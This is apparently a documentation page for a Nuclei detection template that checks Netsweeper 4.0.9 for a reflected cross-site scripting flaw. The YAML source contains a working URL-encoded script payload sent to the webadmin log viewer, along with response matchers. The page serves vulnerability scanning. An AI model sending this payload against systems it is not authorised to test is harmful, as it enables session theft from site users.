Netsweeper 4.0.9 - Cross-Site Scripting
ID: netsweeper-rxss
Severity: high
Author: daffainfo
Tags: edb,xss,packetstorm,netsweeper
Description
Section titled “Description”Netsweeper 4.0.9 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: netsweeper-rxss
info: name: Netsweeper 4.0.9 - Cross-Site Scripting author: daffainfo severity: high description: Netsweeper 4.0.9 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://www.exploit-db.com/exploits/37930 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 metadata: max-request: 1 tags: edb,xss,packetstorm,netsweeper
http: - method: GET path: - '{{BaseURL}}/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter='
matchers-condition: and matchers: - type: word part: body words: - '</script><script>alert(document.domain)</script>'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 490a0046304402201517534440546fe94f150ee46c98233eef14999735d5f3222ca8ddb1ea4ccdaa022064bc6d9c0d1db4eb8702d9752ab9d3f5894ceec14d1911e03d11b3bf852f051f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/netsweeper/netsweeper-rxss.yaml"